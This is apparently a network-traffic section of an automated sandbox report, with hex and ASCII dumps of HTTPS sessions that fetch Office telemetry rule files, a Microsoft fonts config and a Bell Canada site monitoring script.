                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 2c 5a 62 28 22 6c 61 73 74 4d 6f 64 69 66 69 63 61 74 69 6f 6e 22 29 29 3b 74 28 62 2c 22 73 76 72 69 64 22 2c 7a 65 28 29 29 3b 70 26 26 28 62 2e 65 6e 3d 70 29 3b 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 22 73 72 52 73 22 3d 3d 3d 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 74 28 62 2c 22 6d 73 6c 22 2c 5a 62 28 22 6d 73 6c 22 29 29 3b 62 2e 65 6e 64 3d 31 7d 66 75 6e 63 74 69 6f 6e 20 74 28 61 2c 62 2c 66 29 7b 76 6f 69 64 20 30 3d 3d 3d 61 5b 62 5d 26 26 28 61 5b 62 5d 3d 66 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 29 7b 76 61 72 20 62 3d 22 74 79 70 65 20 73 6e 20 73 76 72 69 64 20 66 6c 61 76 6f 72 20 76 69 20 63 6f 6e 74 65 6e 74 54 79 70 65 20 6d 6f 64 69 66 69 65 64 53 69 6e 63 65 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 50 62 28 22 6f 77 61
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,Zb("lastModification"));t(b,"svrid",ze());p&&(b.en=p);b.contentType&&"srRs"===b.contentType&&t(b,"msl",Zb("msl"));b.end=1}function t(a,b,f){void 0===a[b]&&(a[b]=f)}function A(a){var b="type sn svrid flavor vi contentType modifiedSince".split(" ");Pb("owa
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 42 55 47 5f 49 4e 46 4f 5f 52 45 51 55 45 53 54 45 44 22 2c 47 65 29 3b 51 64 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 66 2c 6b 29 7b 50 62 28 22 73 73 63 22 29 26 26 22 68 74 74 70 73 3a 22 21 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 26 26 61 2e 61 76 28 6b 2c 22 73 63 6f 6e 73 70 22 2c 31 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 64 28 29 7b 72 65 74 75 72 6e 20 49 63 28 22 72 70 69 64 22 29 3f 22 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 22 3a 22 6d 61 6e 75 61 6c 6c 79 22 7d 66 75 6e 63 74 69 6f 6e 20 52 67 28 29 7b 7a 6b 3d 76 6f 69 64 20 30 3b 75 62 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 29 26 26 28 7a 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 29 3b 45 28 22 44 45 42 55 47 5f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: BUG_INFO_REQUESTED",Ge);Qd(function(a,b,f,k){Pb("ssc")&&"https:"!==location.protocol&&a.av(k,"sconsp",1)})}function Sd(){return Ic("rpid")?"automatically":"manually"}function Rg(){zk=void 0;ub(document.currentScript)&&(zi=document.currentScript);E("DEBUG_
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 6c 28 61 2c 62 2c 66 2c 6b 2c 70 2c 79 29 7b 76 6f 69 64 20 30 3d 3d 3d 79 26 26 28 79 3d 22 77 69 6e 22 29 3b 74 72 79 7b 76 61 72 20 4d 3d 6b 6a 5b 79 5d 7c 7c 7b 7d 3b 4d 5b 62 5d 3d 61 5b 62 5d 3b 6b 6a 5b 79 5d 3d 4d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 62 2c 7b 67 65 74 3a 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 5b 62 5d 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 61 29 7b 4d 5b 62 5d 3d 61 61 3b 6b 26 26 28 61 61 7c 7c 70 29 26 26 6b 2e 61 70 70 6c 79 28 61 2c 5b 61 61 5d 29 7d 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 3b 72 65 74 75 72 6e 21 30 7d 63 61 74 63 68 28 61 61 29 7b 7d 72 65 74 75 72 6e 21 31 7d 0a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ))}function zl(a,b,f,k,p,y){void 0===y&&(y="win");try{var M=kj[y]||{};M[b]=a[b];kj[y]=M;Object.defineProperty(a,b,{get:f||function(){return M[b]},set:function(aa){M[b]=aa;k&&(aa||p)&&k.apply(a,[aa])},configurable:!0});return!0}catch(aa){}return!1}functio
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 3a 44 62 2c 68 79 64 72 61 74 65 64 3a 21 31 7d 3b 7a 67 28 29 3b 76 61 72 20 4d 6c 2c 61 6c 3d 6e 75 6c 6c 3d 3d 3d 28 4d 6c 3d 71 68 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 4d 6c 3f 76 6f 69 64 20 30 3a 4d 6c 2e 75 61 2c 6f 6d 3d 67 66 28 61 6c 2c 56 29 3b 52 64 28 6f 6d 29 3b 45 28 22 56 49 45 57 5f 53 54 41 42 4c 45 22 2c 4d 68 29 3b 45 28 22 41 43 54 49 4f 4e 5f 45 4e 54 45 52 45 44 22 2c 4f 65 29 3b 45 28 22 41 43 54 49 4f 4e 5f 42 45 46 4f 52 45 5f 53 45 4e 44 22 2c 62 66 29 3b 0a 45 28 22 41 43 54 49 4f 4e 5f 53 45 4e 54 22 2c 6f 69 29 3b 45 28 22 42 46 5f 43 41 43 48 45 5f 52 45 53 54 4f 52 45 44 22 2c 70 69 29 3b 66 6c 3d 54 67 28 6a 65 29 3b 45 28 22 48 49 53 54 4f 52 59 5f 41 50 49 5f 45 56 45 4e 54 22 2c 47 66 29 3b 4a 65 28 42 62 2c 22 70 6f 70
                                                                                                                                                                                                                                                                                                                                      Data Ascii: :Db,hydrated:!1};zg();var Ml,al=null===(Ml=qh)||void 0===Ml?void 0:Ml.ua,om=gf(al,V);Rd(om);E("VIEW_STABLE",Mh);E("ACTION_ENTERED",Oe);E("ACTION_BEFORE_SEND",bf);E("ACTION_SENT",oi);E("BF_CACHE_RESTORED",pi);fl=Tg(je);E("HISTORY_API_EVENT",Gf);Je(Bb,"pop
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 28 29 7d 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 66 2c 6b 2c 70 29 7b 76 61 72 20 79 2c 4d 3b 76 6f 69 64 20 30 3d 3d 3d 70 26 26 28 70 3d 21 31 29 3b 74 68 69 73 2e 64 6f 6d 4e 6f 64 65 73 3d 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 3b 74 68 69 73 2e 73 74 61 72 74 3d 66 7c 7c 74 68 69 73 2e 73 74 61 72 74 3b 66 3d 21 31 3b 76 61 72 20 61 61 3d 74 68 69 73 2e 73 74 61 72 74 2c 73 61 3d 74 68 69 73 2e 73 74 6f 70 2c 6a 62 3d 74 68 69 73 2e 69 64 2c 70 62 3d 74 68 69 73 2e 5a 62 3b 62 26 26 28 74 68 69 73 2e 45 61 28 4d 61 74 68 2e 6d 61 78 28 62 2c 61 61 2c 73 61 29 29 2c 6b 26 26 28 66 3d 21 30 29 29 3b 69 66 28 70 62 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ()};a.prototype.close=function(b,f,k,p){var y,M;void 0===p&&(p=!1);this.domNodes=document.getElementsByTagName("*").length;this.start=f||this.start;f=!1;var aa=this.start,sa=this.stop,jb=this.id,pb=this.Zb;b&&(this.Ea(Math.max(b,aa,sa)),k&&(f=!0));if(pb)


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      51192.168.2.94978913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-16849878b787bfsh7zgp804my400000008ag00000000crfk
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      52192.168.2.94978813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-16849878b786lft2mu9uftf3y40000000au000000000bpg2
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      53192.168.2.94979013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5af050aa-401e-000a-36a7-2a4a7b000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-159b85dff8f7x84jhC1DFWaghs000000017g00000000cr6e
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      54192.168.2.94979213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6cea588d-401e-0015-2b7f-2a0e8d000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-17c5cb586f6fqqst87nqkbsx1c0000000820000000007awz
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      55192.168.2.94979113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9703a0f8-701e-0001-7449-2bb110000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131158Z-17c5cb586f6fqqst87nqkbsx1c00000007yg00000000dmtd
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      56192.168.2.949787184.28.90.27443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=185680
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:59 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:59 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      57192.168.2.949810206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC2702OUTGET /ruxitagentjs_D_10299241001084140.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: worker
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
